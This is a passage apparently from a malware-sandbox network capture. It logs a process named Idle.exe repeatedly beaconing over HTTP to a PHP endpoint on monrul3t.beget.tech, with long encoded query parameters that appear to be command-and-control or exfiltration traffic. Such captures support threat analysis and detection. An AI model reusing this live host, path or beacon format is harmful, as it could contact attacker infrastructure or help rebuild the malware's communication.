                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye
Jan 11, 2025 18:07:34.707669973 CET | 2948 | OUT | GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWarpWT2UleNZTUE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
Jan 11, 2025 18:07:34.936712027 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:34 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 53645 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 18:07:39.948144913 CET | 2948 | OUT | GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaFRlT2kEROZTUE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
Jan 11, 2025 18:07:40.713232040 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:40 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 53646 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 18:07:45.729319096 CET | 2972 | OUT | GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaJpXT2sGROZTUE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:07:46.607558012 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:46 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            7 | 192.168.2.4 | 53647 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:07:51.620148897 CET2948OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWajRlT2kEVOZTUE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:07:52.627716064 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:52 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            8 | 192.168.2.4 | 53665 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:07:57.654767036 CET2972OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaZpXT20ERNZTVE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:07:58.390382051 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:58 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            9 | 192.168.2.4 | 53705 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:08:03.401104927 CET2972OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaFpWT2kFRNZTVE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:08:04.164170980 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:03 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            10 | 192.168.2.4 | 53742 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:08:09.182076931 CET2921OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfiADWmlWWE5kNnRVT2UFRNl2bqlUbapnTzEFRPxmRU50MVpXTy0kMNVTVUpVaS1WW4FlaORTUy4ENFJjTrZUbZhmSXlFbadkW6l0QMlWVD1keJl2TptGRNhXWU9UaKRVTrZUbONzYq1EerRkT4FFROxmU65ENNpXT6FkaO1mTy00dRRUTzk [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:08:09.938411951 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:09 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            11 | 192.168.2.4 | 53778 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:08:14.947891951 CET2972OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaRRVT2smaNZTVE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:08:15.685311079 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:15 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            12 | 192.168.2.4 | 53816 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:08:20.748509884 CET2972OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaRRUT2kEROZTVE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:08:21.459779024 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:21 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            13 | 192.168.2.4 | 53855 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
